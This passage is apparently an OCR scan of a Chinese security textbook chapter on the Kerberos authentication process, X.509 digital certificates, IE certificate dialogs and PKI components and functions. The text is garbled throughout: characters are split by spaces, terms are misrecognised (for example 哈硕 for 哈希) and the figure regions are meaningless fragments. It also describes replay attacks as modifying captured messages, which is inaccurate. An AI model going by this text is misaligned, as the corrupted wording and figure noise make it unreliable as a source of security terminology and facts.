自己 要 求 提供 服务 的 服务 器 证 明 自 己 的 身份 。 

密 钥 分 配 中 心 : 通常 将 AS 和 TGS 统称 为 KDC。 

领域 (Realm) : KDC 自治 管理 的 计算 机 和 用 户 等 通信 参与 方 的 全 体 称 为 领域 。 领 
域 是 从 管理 角度 提出 的 概念 ,与 物理 网 络 或 者 地 理 范围 等 无 关 。 在 实际 使 用 中 ,为 
了 方便 ,通常 选择 与 Internet 域名 系统 一 致 的 名 字 来 命名 领域 。 不 同 领 域 中 的 用 户 
之 间 也 能 进行 身份 认证 。 


此 外 ,还 有 保证 票据 、 密 码 等 信息 安全 传输 所 需要 的 密 钥 。 

3.3.2.2 Kerberos 的 认证 过 程 

当 一 个 用 户 需要 访问 一 个 应 用 服务 器 时 , 它 首 先 需 要 向 目标 服务 器 验证 自己 的 身份 , 同 
时 也 要 确认 该 服务 器 的 身份 ,这 就 构成 了 双向 身份 认证 。 认 证 的 步骤 如 图 3.6 所 示 。 


(1) Se 


客户 端 目标 服务 器 
图 3. 6 Kerberos 认证 过 程 


(1) 客户 端 向 KDC 发 送 自己 的 身份 信息 (用 户 名 /口令 、IP 地 址 等 ) ,申请 TGT。 
(2) KDC 根据 收 到 的 客户 端 发 送 来 的 信息 进行 认证 ,确认 后 从 AS 生成 TGT, 并 用 事 
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先 确定 的 客户 端 与 KDC 之 间 的 共享 密 钥 对 TGT 进行 加 密 , 然 后 回复 给 客户 端 。TGT 包含 客 
户 端 信息 .时间 戳 .生存 期 等 信息 。 此 时 只 有 真正 的 客户 端 才能 利用 它 与 KDC 之 间 的 共享 密 
钥 对 TGT 进行 解密 ,从 而 获得 TGT。 共 享 密 钥 通常 是 用 户口 令 经 过 哈 硕 (Hash) 生 成 的 。 
(3) 客户 端 再 将 获得 的 TGT 和 要 请 求 的 目标 服务 器 等 信息 经 过 加 密 后 发 送 给 KDC， 
申请 访问 目标 服务 器 所 需 的 票据 。 
(4) KDC 中 的 TGS 生成 一 个 会 话 密 钥 (Session Key) ,用 于 目标 服务 器 对 客户 端的 身 
份 识别 。 然 后 KDC 将 这 个 会 话 密 钥 和 用 户 名 ,用 户 地 址 (IP)、 服 务 名 有效 期 ,时间 戳 等 一 起 
封装 成 一 个 票据 ,并 用 它 和 目标 服务 器 之 间 的 密 钥 对 这 个 票据 进行 加 密 。 同 时 ,用 它 和 客户 端 
之 间 的 密 钥 对 会 话 密 钥 进行 加 密 。 最 后 ,将 加 密 后 的 票据 和 会 话 密 钥 一 并 返回 给 客户 端 。 
(5) 客户 端 将 收 到 的 票据 转发 至 目标 服务 器 。 由 于 客户 端 不 知道 KDC 与 目标 服务 器 
之 间 的 密 钥 ,所 以 它 无 法 自 改 票据 中 的 信息 。 同 时 ,客户 端 对 收 到 的 会 话 密 钥 进行 解密 , 然 
后 将 自己 的 用 户 名 、 用 户 地 址 (IP) 打 包 成 身份 认证 者 (Authenticator) 信 息 ,用 会 话 密 钥 对 其 
进行 加 密 ,一 并 发 送 给 目标 服务 器 。 身 份 认证 者 信息 的 作用 是 防止 攻击 者 将 来 再 次 使 用 同 
样 的 凭据 。 
(6) 目标 服务 器 利用 它 与 KDC 之 间 的 密 钥 对 收 到 的 票据 进行 解密 ,从 而 得 到 会 话 密 
钥 、 用 户 名 、 用 户 地 址 (IP) .服务 名 和 有 效 期 等 信息 。 然 后 再 用 会 话 密 钥 对 身份 认证 者 信息 
解密 ,获得 用 户 名 .用户 地 址 (IP) 等 信息 ,并 将 其 与 之 前 从 票据 中 解密 出 来 的 用 户 名 .用户 地 
址 (IP) 等 信息 进行 比较 以 验证 客户 端的 身份 。 最 后 将 验证 结果 发 送 给 客户 端 , 响 应 用 户 的 
3.3.2.3 Kerberos 的 特点 
Kerberos 协议 是 专 为 开放 网 络 设计 的 ,充分 考虑 到 了 信息 在 网 络 传输 过 程 中 可 能 遇 到 
的 被 截取 、 修 改 和 插入 等 安全 威胁 ,其 安全 性 经 过 了 长 期 的 实践 考验 ,具有 以 下 特点 : 
。 客户 端 与 KDC,KDC 与 目标 服务 器 之 间 在 协议 工作 前 就 需要 有 各 自 的 共享 密 钥 。 
。 Kerberos 协议 借助 对 称 密码 技术 DES 进行 加 密 和 认证 ,在 每 个 客户 端 和 目标 服务 
器 之 间 建 立会 话 密 钥 (双方 使 用 的 临时 加 密 密 钥 ) ,保证 了 传递 的 消息 具备 机 密 性 
(Confidentiality) 和 完整 性 (Integrity) ,但 是 不 具备 抗 否 认 性 。 
。 Kerberos 协议 要 求 用 户 经 过 AS 和 TGS 两 重 认证 ,减少 了 用 户 密 钥 中 密 文 的 暴露 
次 数 ,以 减少 攻击 者 对 有 关 用 户 密 钥 中 密 文 的 积累 。 
。 Kerberos 协议 中 的 票据 具有 时 效 性 ,存放 于 用 户 的 信用 缓存 中 。 和 凭据 在 有 效 期 后 自 
动 失效 ,以 后 的 通信 必须 从 KDC 获得 新 的 票据 进行 认证 。 比 如 , 当 断 开 或 退出 网 络 
时 ,票据 即 到 期 。 系 统管 理 员 可 以 根据 管理 的 需要 改变 票据 的 有 效 期 长 短 ,一 般 默 
认 时 间 是 一 天 。 
。 Kerberos 运用 票据 的 时 间 戳 来 检测 对 证 书 的 重 放 和 欺骗 攻击 。 重 放 就 是 截获 信息 
并 把 截获 的 信息 进行 修改 ,然后 把 修改 后 的 信息 重新 发 送 给 等 待 接收 信息 的 实体 。 
。 Kerberos 协议 认证 具有 单 点 登录 (Single SignrOn,SSO) 的 优点 ,只 需要 用 户 输入 一 
次 身份 验证 信息 ,就 可 以 利用 获得 的 有 效 期 内 的 TGT 访问 多 个 服务 。 
。 由 于 协议 中 的 消息 无 法 穿 透 防 火 墙 ,所 以 Kerberos 协议 往往 用 于 一 个 组 织 的 内 部 。 
Kerberos 也 存在 不 足 之 处 。 例 如 ,Kerberos 协议 在 很 多 地 方 都 涉及 时 间 , 如 票据 的 有 
效 期 .时 间 戳 等 ,如 果 各 主机 的 时 间 偏 差 较 大 , 则 Kerberos 认证 系统 将 会 失效 。 所 以 需要 在 
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系统 设计 时 考虑 到 时 间 的 偏差 ,可 以 采取 某 些 方法 来 解决 各 主机 节点 时 间 同 步 问 题 。 如 果 
某 台 主机 的 时 间 被 更 改 ,那么 这 台 主 机 就 无 法 使 用 Kerberos 认证 协议 。 一 旦 服务 器 的 时 间 
发 生 了 错误 , 则 整个 Kerberos 认证 系统 将 会 失效 。 另 外 ,采用 时 间 戳 的 方式 防止 重 放 攻 击 
的 代价 也 较 高 。 


3.3.3 非 对 称 密码 认证 


非 对称 密 码 算法 中 , 私 钥 是 保密 的 ,外 人 无 法 获知 ,所 以 私 钥 往 往 就 代表 了 某 个 通信 参 
与 方 的 身份 。 基 于 非 对 称 密码 的 身份 认证 协议 中 ,用 户 通 过 证 明 他 知道 某 私 钥 来 证 明 自己 
的 身份 ,而 且 不 需要 将 自己 的 私 钥 传输 给 服务 方 。 

采用 非 对 称 密码 方式 进行 身份 认证 时 ,需要 事先 知道 对 方 的 公 钥 ,虽然 可 以 采取 某 些 方 
法 来 保证 公 钥 传输 的 安全 性 ,但 是 如 果 每 个 通信 参与 方 都 需要 存储 其 他 所 有 用 户 的 公 钥 , 既 
增加 了 负担 又 不 便于 更 新 维护 ,而 且 每 个 通信 方 自己 产生 的 私 铀 和 公 钥 的 可 信和 度 也 不 一 样 ， 
所 以 需要 一 个 可 信和 的 第 三 方 来 参与 公 钥 分 发 。 在 实际 网 络 环境 中 , 非 对 称 密码 认证 系统 采 
用 证 书 (Certificate) 的 形式 来 管理 和 分 发 公 钥 。 证 书 将 一 个 实体 和 一 个 公 钥 捆 绑 ,并且 其 他 
实体 能 对 这 种 绑 定 进行 验证 。 证 书 由 证 书 权威 机 构 (Certificate Authority,CA) 签 发 。CA 
是 大 家 都 信任 的 机 构 , 充 当 可 信 的 第 三 方 角色 。 前 文 所 述 的 KDC 和 CA 都 充当 了 分 发 密 钥 
的 角色 ,它们 各 有 优 缺 点 。 

非 对 称 密码 身份 认证 方式 的 安全 性 更 强 , 但 是 计算 开销 大 。 当 前 更 多 的 安全 系统 利用 
非 对称 密 码 进行 认证 和 建立 对 称 的 会 话 密 钥 ,利用 对 称 密码 进行 大 数据 量 传输 的 加 密 ,例如 
SSL 协议 .PGP 等 。 

非 对 称 密码 认证 的 一 个 显著 优点 是 : 只 要 服务 器 认为 提供 用 户 证 书 的 CA 是 可 信 的 ， 
就 认为 用 户 是 可 信和 的 ,所 以 非常 适合 电子 商务 类 的 业务 需求 ,例如 信用 卡 支付 。 服 务 方 可 根 
据 用 户 CA 的 发 行 机 构 的 可 靠 性 程度 来 对 用 户 进行 授权 。 

3.3.3.1 PKI 





1. 数字 证 书 

1) 什么 是 数字 证 书 

数字 证 书 (Digital Certificate) 也 称 为 数字 标识 (Digital ID) ,是 用 来 标识 网 络 用 户 身份 
信息 的 一 种 特殊 格式 的 数据 编码 ,是 用 户 或 机 构 在 网 络 环境 中 的 身份 证 ,用 以 确保 网 络 传输 
信息 的 机 密 性 、 完 整 性 以 及 通信 双方 身份 的 真实 性 、 不 可 否认 性 。 

数字 证 书 采用 公 钥 密码 体制 ,每 个 用 户 用 各 自 的 私 钥 进 行 解密 和 签名 ,用 公 钥 进行 加 密 
和 验证 签名 。 当 发 送 一 份 保密 文件 时 ,发 送 方 使 用 接收 方 的 公 钥 对 数据 加 密 , 而 接收 方 则 使 
用 自己 的 私 钥 解密 。 因 为 用 户 私 钥 仅 为 他 本 人 所 有 ,所 以 就 产生 了 别人 无 法 生成 的 文件 ,也 
就 形成 了 数字 签名 。 采 用 数字 签名 ,一 是 能 够 保证 信息 是 由 签名 者 自己 发 送 的 ,签名 者 不 能 否 
认 或 难以 和 否认; 二 是 能 够 保证 信息 自 签发 后 到 收 到 为 止 未 被 修改 , 即 签发 的 文件 是 真实 
文件 。 

用 户 如何 获 得 密 钥 对 ? 一 般 情 况 下 , 当 用 户 申请 数字 证 书 时 ,激活 安全 设置 会 为 用 户 产 
生 密 钥 对 。 为 了 安全 , 密 钥 对 应 当 在 本 地 产生 并 且 私 人 密 钥 不 能 在 网 上 传输 。 一 旦 产生 密 
钥 对 ,就 应 在 CA 登记 自己 的 公共 密 钥 ,随后 CA 将 数字 证 书 发 送 给 用 户 , 以 证 实用 户 的 公 
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共 密 钥 及 其 他 一 些 信息 。 
用 户 如 何 发 现 别 人 的 公共 密 钥 ? 用 户 可 以 通过 电子 












































邮件 或 CA 提供 的 目录 服务 等 方式 获取 其 他 用 户 的 公 钥 。 人 

一 般 的 目录 服务 都 具备 抗 攻 击 能 力 ,用 户 可 以 确信 其 上 所 数字 签名 算法 

列 的 公共 密 钥 都 是 可 信和 的。 为 了 保证 CA 的 公共 密 钥 的 颁发 者 标识 

安全 ,必须 使 用 很 长 的 公共 密 钥 (如 1024 位 ), 有 时 还 需 经 | 

常 更 换 密 钥 。 A 
2) 数字 证 书 的 格式 颁发 者 唯一 标识 符 
目前 广泛 使 用 的 数字 证 书 标准 是 X. 509 v3 ,如 图 3. 7 主体 唯一 标识 符 

所 示 。 该 国际 标准 规定 了 证 书 的 格式 ,并 且 规定 了 建立 证 扩展 

书 发 放 系统 的 一 些 模式 。 图 3.7 X.509 数字 证 书 基本 格式 
其 内 容 主要 包括 : 


。 版 本 号 。 描 述 该 证 书 的 版 本 ,这 可 以 影响 证 书 中 所 指定 的 信息 ,迄今 为 止 , 已 定义 的 
版 本 有 3 个。 例如 使 用 的 是 X. 509 版 本 3, 则 值 为 2。 
。 序列 号 。 由 证 书 颁发 者 (CA) 给 该 证 书 分 配 的 唯一 标识 符 。 
。 签名 。 用 于 说 明 该 证 书 使 用 的 数字 签名 算法 ,由 对 象 标识 符 和 相关 参数 组 成 。 例 
如 ,SHA1(Secure Hash Algorithm ,安全 哈 希 算法 ) 和 RSA 的 对 象 标 识 符 就 用 来 说 
明 该 数字 签名 是 利用 RSA 对 SHA1 杂凑 加 密 。 
。 颁发 者 。 证 书 颁 发 者 标识 ,必须 是 非 空 的 。 
。 有效期。 表示 证 书 有 效 的 时 间 段 ,以 起 始 日 期 和 时 间 及 终止 日 期 和 时 间 表 示 ,必须 
要 说 明 。 所 选 有 效 期 取决 于 许多 因素 ,例如 用 于 签 写 证 书 的 私 钥 的 使 用 频率 及 愿 为 
证 书 支付 的 金钱 等 。 
。 主体 。 证书 拥 有 者 标识 ,此 字段 必须 是 非 空 的 ,除非 使 用 了 其 他 的 名 字形 式 。 
。 主体 公 钥 信息 。 包 括 主体 的 公 钥 和 该 密 钥 所 属 公 钥 密码 系统 的 算法 标识 符 及 所 有 
相关 的 密 钥 参数 。 
。 颁发 者 唯一 标识 符 。 属 于 可 选项 。 
。 主体 唯一 标识 符 。 证 书 拥有 者 的 唯一 标识 符 ,属于 可 选项 。 
。 扩展 。 可 选 的 标准 和 专用 扩展 。 
3) 数字 证 书 的 种 类 
根据 使 用 者 的 不 同 ,数字 证 书 可 以 分 为 用 户 证 书 、 系 统 证 书 、 软 件 证 书 3 种 。 用 户 证 书 
为 个 人 、 机 器 或 机 构 提供 身份 凭证 ; 系统 证 书 是 指 CA 系统 自身 的 身份 凭证 ; 软件 证 书 通常 
为 可 以 从 网 络 上 下 载 的 软件 提供 凭证 ,以 便 下 载 用 户 获取 相关 信息 。 
4) 数字 证 书 的 存储 
数字 证 书 的 存储 介质 主要 有 硬盘 、IC 卡 及 USB Key 等 形式 。 使 用 硬盘 存储 方式 适用 
于 不 常 更 换 计算 机 的 个 人 用 户 ,但 这 种 方式 存在 一 个 安全 隐患 ,因为 在 使 用 证 书 时 必须 将 证 
书 和 私 钥 导 入 浏览 器 (如 IE) 中 ,所 以 其 他 人 可 以 通过 使 用 用 户 的 计算 机 以 非法 使 用 该 用 户 
的 数字 证 书 。 使 用 IC 卡 和 USB Key 就 可 避免 发 生 上 述 安全 问题 ,因为 用 户 私 钥 是 在 IC 卡 
和 USB Key 中 产生 的 , 且 私 钥 不 可 导出 。 在 IE 中 使 用 导入 的 证 书 时 ,如 果 没 有 IC 卡 或 
USB Key 也 是 无 法 使 用 的 。 由 于 IC 卡 必 须要 有 专用 的 读 写 器 ,使 用 不 太 方 便 , 因 此 小 巧 美 
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观 、 安 全 方便 的 USB Key 逐渐 成 为 数字 证 书 存储 的 首选 设备 。 

当前 许多 场合 使 用 的 是 浏览 器 数字 证 书 。 浏 览 器 证 书 存 储 于 IE 浏览 器 中 ,可 任意 备份 
证 书 和 私 钥 。 客 户 端 不 需要 安装 驱动 程序 (根据 情况 可 能 需要 下 载 安装 最 新 的 签名 控件 )， 
且 无 需 证 书 成 本 。IE 浏览 器 证 书 比 较 适合 有 固定 上 网 地 点 的 客户 ,可 以 通过 IE 浏览 器 进 
行 查看 。 

选择 下 浏览 器 的 “工具 ”菜单 “Internet 选项 ”命令 ,在 对 话 框 中 选择 "内容 ”选项 卡 ,如 
图 3.8 所 示 。 


Internet 选项 


常规 [安全 | 隐私 内容 [连接 [程序 [高 级 | 


内 容 审查 程序 一 一 一 一 一 一 一 
@ rim ve 二 


启用. 设置 I 














证 书 


使 用 加 密 连 接 和 标识 的 证 书 。 


自动 完成 
是 
加 We 
































图 3.8 ”IE 的 数字 证 书 选 项 窗口 
单 击 “ 证 书 ” 按 钮 ,系统 将 弹出 证 书 管理 器 窗口 ,如 图 3. 9 所 示 。 





《所 有 >》 
[个 人 [其 好 人 [中 级 证 书 堪 发 机 构 受信 任 的 根 证 书 颁发 机 构 | 受信 任 的 发 行者 ] 国 加 
颁发 给 颁发 者 截止 日 期 ， 好 记 的 名 :加 


国 certisim Antoridade C. Certisign Autori 2018-6-27 Certisigr 
Certisign Autoridade C... Certisign Autori... 2018-7-10 Certisig 

















Class 1 Public 了 2028-8-2 。 YariSim 
Class 1 Public F. 2020-1-8 。 yeriSim 
Class 2 Prinary CA 2019-7-7 。 CertPlus 


























图 3.9 下 证 书 管理 器 窗口 
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选择 需要 查看 的 证 书 ,然后 单 击 “ 查 看 ”按钮 ,系统 弹出 证 书 查看 窗口 ,如 图 3. 10 所 示 。 
窗口 中 显示 了 该 证 书 的 相关 信息 。 


| 详细 信息 」 证 书 路 径 | 








证 书信 息 


这 个 证 书 的 目的 如 下 - 
* 保护 电子 邮件 消息 





* 保证 远程 计算 机 的 身份 
* 所 有 发 布 策略 





颁发 给 : ”Class 1 Frimary CA 
颂 发 者 : Class 1 Prinary CA 


有 效 起 妨 日 期 1999-7-8 到 2020-7-7 





颁发 奢 说 明 臣 














图 3.10 IE 证书 查看 窗口 
单 击 图 3.9 中 的 “高 级 "按钮 ,可 以 查看 证 书 的 使 用 目的 ,如 图 3. 11 所 示 。 


证 书目 的 
选择 一 个 或 更 多 目的 ， 列 在 “高 级 目的 ”下 。 


证 书目 的 @C) 
3 | 
口 客户 端 验证 
代码 签名 
口 安全 电子 邮件 
加 时间 改 








导出 格式 
将 证 书 拖 到 文件 夹 时 ， 请 选择 默认 拖 放 导出 格式 。 








导出 格式 加 [DER 编码 二 进 制 x.509 (x. cer) 
包括 证 书 路 径 中 所 的 有 证 世 全 ) 











图 3.11 下 证 书目 的 


根据 用 途 的 不 同 ,数字 证 书 可 以 分 为 签名 证 书 和 加 密 证 书 两 种 。 签 名 证 书 用 于 对 用 户 
传输 的 信息 进行 签名 ,数据 接收 方 可 以 根据 数字 证 书 来 确认 发 送 方 的 身份 。 由 于 发 送 方 的 
数字 证 书 只 有 发 送 方 具有 ,所 以 具备 不 可 否认 性 特征 。 加 密 证 书 用 于 对 用 户 传输 的 信息 进 
行 加 密 , 只 有 正确 的 数据 接收 方才 能 对 加 密 信息 进行 解密 ,而 且 可 以 判断 传输 的 信息 是 否 在 
传输 过 程 中 被 算 改 过 ,所 以 具备 保密 性 和 完整 性 特征 。 对 于 加 密 证 书 ,CA 需要 备份 用 户 的 
私 钥 。 

2. PKI 的 定义 


PKI(Public Key Infrastructure, 公 钥 基 础 设施 ) 是 采用 非 对 称 密码 ( 公 钥 密码 ) 的 原理 
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和 技术 建立 的 具有 通用 性 的 提供 安全 服务 的 安全 基础 设施 ,包括 创建 ,管理 ,存储 、 分 发 和 撤 
销 公 和 钥 证 书 所 需要 的 相关 硬件 、 软 件 和 策略 。 

PKI 采用 证 书 管理 密 钥 ,通过 可 信 CA 将 用 户 的 身份 信息 与 其 公 钥 相 拥 绑 ,提供 身份 认 
证 服务 。PKI 提供 了 一 种 系统 化 的 、 可 扩展 的 、 统 一 的 、 容 易 控制 的 公 钥 管理 和 证 书签 发 体 
系 ,通过 各 组 件 和 策略 组 合 为 网 络 通 信和 的 机 密 性 、 完 整 性 、 真 实 性 和 不 可 否认 性 提供 保障 。 

基于 PKI 的 认证 服务 通过 数字 签名 和 密码 技术 来 确认 身份 。 假 如 实体 A 需要 验证 实 
体 B 的 身份 ,那么 首先 A 要 获取 B 的 证 书 , 并 用 双方 共同 信任 的 CA 的 公 钥 验证 B 的 证 书 
上 CA 的 数字 签名 ,如 果 签 名 通过 , 则 说 明 B 的 证 书 是 可 信和 的 。 然 后 ,A 向 B 发 出 随机 字符 
串 信 息 ,B 接收 到 信息 后 ,用 B 的 私 钥 进行 签名 处 理 后 再 发 回 A。 如 果 A 能 够 利用 B 的 证 
书 解密 B 签名 的 信息 , 则 A 就 确认 了 B 的 身份 。 这 是 因为 只 有 B 的 公 钥 才能 解 开 其 签名 的 
信息 。 

PKI 是 当前 互联 网 通信 安全 的 重要 技术 和 基础 ,为 电子 商务 .电子 政务 等 互联 网 应 用 提 
供 安全 保障 。PKI 技术 遵循 相关 的 国际 标准 和 RFC 文档 (如 PKCS、SSL、X. 509、LDAP 
等 ) ,提供 了 比较 成 熟 、 完 善 的 网 络 系统 安全 解决 方案 。 随 着 新 的 技术 不 断 出 现 ,CA 间 的 信 
任 模 型 .使 用 的 密码 算法 和 密 钥 管理 方案 等 越 来 越 完善 。 

3. PKI 的 组 成 

一 个 PKI 系统 需要 多 个 组 件 实体 之 间 的 联合 操作 ,主要 包括 认证 中 心 (CA) ,注册 中 心 
(Registration Authority, RA) .LDAP(LightWeight Directory Access Protocol, 轻 量 目 录 
访问 协议 ) 目 录 服 务 器 、 应 用 接口 等 ,如 图 3. 12 所 示 。 











根 CA 系统 


1 
1 
1 


认证 中 
证 中 心 外 
| 一 人 一 一 ow 他 


CA 数据 库 密 钥 管理 (KM) 
数据 库 

















注册 中 心 
RA 











RA 数据 库 
图 3.12 PKI 的 组 成 结构 


1) 认证 中 心 (CA) 

CA 是 整个 PKI 系统 中 的 可 信 第 三 方 . 它 保证 了 公 钥 证 书 的 合法 性 ,是 整个 PKI 系统 
的 核心 ,负责 对 用 户 证 书 的 签发 ,作废 、 更 新 和 管理 。 由 于 CA 得 到 各 方 的 信任 ,所 以 拥有 它 
签发 的 数字 证 书 的 通信 对 方 的 身份 也 就 可 以 信任 。 

2) 注册 中 心 (RA) 

RA 负责 对 证 书 申请 用 户 进 行 审查 ,对 通过 审核 的 用 户 进行 注册 ,并 协助 CA 对 证 书 进 
行 签发 和 管理 。 一 些小 规模 的 PKI 系统 中 没有 设立 独立 的 RA ,其 职能 由 CA 担负 ,但 这 样 
会 增加 整个 系统 的 安全 风险 。 
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3) LDAP 目录 服务 器 

LDAP 目录 服务 器 用 于 存 取 证 书 和 证 书 作 废 表 (Certificate Revocation List, CRL) 信 
息 。 目 录 系统 是 PKI 的 重要 基础 ,LDAP 协议 是 访问 证 书库 和 CRL 的 主要 方式 ,是 访问 
PKI 目录 服务 的 标准 协议 要 求 。 用 户 可 通过 LDAP 目录 服务 进行 证 书 和 公 钥 的 查找 和 获 
取 , 通 过 查询 CRL 以 验证 用 户 的 证 书 状 态 。 

4) 应 用 接口 (APD 

PKI 的 价值 在 于 使 用 户 能 够 方便 地 使 用 加 密 、 数 字 签 名 等 安全 服务 ,因此 一 个 完整 的 
PKI 必须 提供 良好 的 应 用 接口 系统 ,使 得 各 种 各 样 的 应 用 能 够 以 安全 一致 ,可 信 的 方式 与 
PKI 交互 ,确保 安全 网 络 环境 的 完整 性 和 易 用 性 。 

4. PKI 的 功能 


一 个 完整 有 效 的 PKI 系统 功能 主要 包括 注册 管理 \ 证 书签 发 .证书 作废 ,证 书 管理 证 
书 校 验 、 密 钥 管理 等 功能 。 
1) 注册 管理 
注册 是 即将 成 为 证 书 主体 的 终端 实体 使 CA 认识 自己 的 过 程 。 终 端 实体 可 以 通过 RA 
注册 ,如 果 由 CA 实现 RA 的 功能 ,终端 用 户 也 可 以 直接 向 CA 注册 。RA 主要 负责 对 用 户 
的 身份 信息 进行 收集 和 资格 审查 ,主要 包括 以 下 几 个 功能 : 
。 获取 用 户 身 份 信息 。 用 户 将 个 人 身份 信息 (密码 .E-mail 等 ) 提 交 给 RA,RA 完成 用 
户 注册 信息 的 填写 。 
。 审核 用 户 信息 。 对 用 户 的 注册 信息 进行 审核 ,审核 通过 后 ,产生 用 户 的 PIN。PIN 
是 RA 赋予 用 户 的 标识 ,所 以 要 求 PIN 具有 唯一 性 ,另外 PIN 还 应 具备 随机 性 特征 
和 足够 的 长 度 以 应 对 猜测 攻击 和 穷 举 攻击 。 
。 注册 。 以 用 户 的 E-mail 的 哈 希 值 作为 密 钥 对 PIN 进行 加 密 。 保 存 用 户 的 E-mail、 
密码 和 加 密 后 的 PIN ,作为 以 后 对 用 户 身份 进行 验证 的 凭据 。 将 加 密 后 的 PIN 以 安 
全 的 方式 发 送 给 用 户 。 
。 提交 证 书生 成 申请 。RA 向 CA 提交 证 书生 成 申请 。 
2) 证 书签 发 
证 书签 发 是 CA 乃至 整个 PKI 的 核心 功能 ,主要 包括 以 下 步 又， 
(1) 用 户 提交 证 书 申请 。 如 果 用 户 申请 的 是 加 密 证 书 , 申 请 信息 只 有 用 户 信息 。 如 果 
申请 的 是 签名 证 书 , 则 申请 信息 中 还 要 包含 用 户 的 公 钥 。 
(2) RA 对 申请 进行 审核 。 有 的 PKI 系统 需要 CA 进一步 做 审核 。 如 果 审 核 通过 ,RA 
将 向 CA 提交 证 书生 成 请 求 。 
(3) CA 生成 证 书 。 如 果 生 成 的 是 加 密 证 书 ,CA 需要 产生 一 对 公私 钥 , 公 钥 用 于 备份 
用 户 的 私 钥 , 私 钥 用 于 恢复 用 户 的 私 钥 。 如 果 生 成 的 是 签名 证 书 , 需 要 对 用 户 数 字 签名 进行 
验证 。 
(4) 证 书 发 布 。CA 在 签发 一 份 证 书后 ,需要 在 系统 内 公布 用 户 的 证 书 , 以 便 其 他 用 户 
能 获取 。 最 常用 的 发 布 形式 是 将 用 户 的 证 书 存储 到 LDAP 目录 服务 器 上 。 也 可 以 发 布 到 
Web 服务 器 (返回 给 用 户 一 个 URL, 供 用户 下 载 )、FTP 服务 器 或 其 他 目录 访问 服务 器 ( 比 
如 XX. 509) 上 。 
(5) 用 户 下 载 和 安装 证 书 。 用 户 下 载 个 人 证 书 , 并 安装 到 浏览 器 。 在 安装 加 密 证 书 时 
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需要 输入 证 书 安装 密码 。 如 图 3. 13 所 示 ,中国 银 行 的 网 银 用 户 登录 窗口 右 侧 就 提供 了 ”CA 
证 书 下 载 ?服务 。 


汉中 国 银行 -HECrosoft Internet Explorer 


@ 1k 生 


BANK OF CHINA 


银 / 


Bochner 
区 


Englist 


日 安 全 须知 
动态 口令 登录 日 常见 问题 


用 户 名 和 密码 对 大 小 写字 母 悚 感 ， 请 注意 区 上 @ 电子 恨 行 章程 
分 


人 了 风 IR 务 规则 





加 CA 下 书 下 载 


找 加 用 户 名 密友 ” 入 登录 


周 首 次 登录 时 ， 请 下 载 并 安装 “网 上 银行 登录 安全 控件 "”。 

每 次 使 用 网 眼 行 的 服务 后 ， 请 点 击 页 面 右上 角 的 “退出 ”按钮 退出 。 
网 良 用 尸首 次 登录 时 ， 请 使 用 柜台 注册 时 获取 的 “网 由 登 录用 尸 名 ”登录 。 首 次 登录 成 功 后 , 可 
以 重新 设 定 用 户 各 。 

司 使 用 中 国 银行 新 版 网 银 CA 正 书 的 客户 ， 请 点 击 “C 刻 仙 正 书 ”、“ 网 银 二 绿 CAI 下 书 ” 下 载 安装 。 





图 3.13 ”中国 银行 网 银 登 录 窗口 

3) 证 书 撤销 

在 数字 证 书 的 有 效 期 内 ,如 果 由 于 某 些 原因 需要 提前 停止 使 用 ,证 书 就 需要 被 撤销 。 例 
如 ,证 书 的 一 些 信息 (如 用 户 名 、 单 位 等 ) 发 生 了 改变 、 私 钥 被 泄露 等 。CA 在 收 到 证 书 撤销 
申请 后 执行 证 书 撤销 ,并 通知 有 用户。 被 CA 作废 的 证 书 将 不 再 可 信 , 所 以 用 户 在 使 用 证 书 
时 ,系统 需要 检查 证 书 是 否 已 被 撤销 。 

证 书 撤销 的 实现 方法 有 两 种 : 

。 利用 周期 性 发 布 机 制 ,典型 的 是 证 书 撤销 列表 (CRL)。 

。 在 线 证 书 状态 协议 (Online Certificate Status Protocol.OCSP) 。 

CRL 数据 结构 的 内 容 包 括 版 本 号 、 签 名 算法 标识 符 、 发 现 者 名 称 、 本 次 发 布 时 间 、 下 次 
更 新 时 间 、 撤 销 的 证 书 ( 证 书 序列 号 、 撤 销 时 间 ) 等 。 

CA 在 撤销 一 个 证 书后 就 对 CRL 进行 更 新 ,增加 被 撤销 证 书 的 信息 。CRL 的 大 小 随 着 
被 撤销 的 证 书 增多 而 不 断 变 大 。 对 此 有 两 种 解决 办 法 : 一 是 采用 分 段 式 CRL ,将 一 个 CA 
的 撤销 信息 存放 在 多 个 CRL 中 ,这 些 CRL 可 以 分 布地 存放 在 多 个 服务 器 上 ; 二 是 采用 增 
量 CRL(delta-CRL) 方 式 , 基 本 思想 是 每 撤销 一 个 证 书 只 产生 新 增加 的 证 书 撤销 信息 ,用 户 
通过 获取 增 量 CRL 来 更 新 本 地 的 CRL。 

OCSP 为 用 户 提供 实时 在 线 证 书 状态 查询 ,这 样 可 以 避免 由 于 CRL 太 大 而 造成 的 传输 
困难 、 处 理 效 率 低下 的 问题 ,也 避免 了 CA 中 的 CRL 和 用 户 的 CRL 不 一 致 的 现象 ,增强 了 
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安全 性 。 

4) 证 书 管理 

除了 前 面 介绍 的 证 书 的 发 布 和 撤销 外 ,证 书 管理 包括 的 功能 还 有 证 书 验 证 ,证 书 更 新 、 
证 书 归档 等 。 

(1) 证 书 验证 。 

用 户 在 对 证 书 进行 验证 时 需要 完成 以 下 任务 : 验证 证 书 的 签名 ,确定 证 书 的 合法 性 ; 
检查 证 书 的 有 效 期 ; 核实 证 书 的 用 途 是 否 符合 要 求 ; 确认 该 证 书 没 有 被 撤销 。 在 一 个 复杂 
而 庞大 的 PKI 系统 中 ,CA 具有 层次 结构 或 是 分 布 式 的 ,用 户 在 对 证 书 验证 时 需要 进行 证 书 
链 校 验 或 交叉 认证 ,具体 内 容 在 后 面 的 信任 模型 部 分 详细 说 明 。 

(2) 证 书 更 新 。 

在 证 书 已 到 有 效 期 或 者 证 书 的 一 些 属性 已 经 改变 且 需 要 重新 证 明 时 需要 进行 证 书 更 
新 。 证 书 更 新 包括 用 户 证 书 更 新 和 CA 证 书 更 新 两 种 。 

用 户 证 书 的 更 新 方式 有 两 种 : 

。 人 工 更 新 ,RA 根据 用 户 的 更 新 申请 信息 对 用 户 证 书 进行 更 新 。 

。 自动 更 新 ,CA 对 快要 到 期 的 用 户 证 书 自动 进行 更 新 。 

由 于 CA 证 书 的 特殊 性 ,需要 采取 一 些 步骤 使 得 向 新 证 书 的 转换 更 加 平滑 。CA 证 书 
更 新 时 要 用 它 的 新 私 钥 为 旧 公 钥 签名 ,用 旧 私 钥 为 新 公 钥 签名 ,最 后 再 用 新 私 钥 为 新 公 钥 签 
名 ,这 时 自 签名 的 CA 证 书 代表 新 的 可 信 第 三 方 。 

(3) 证 书 归档 。 

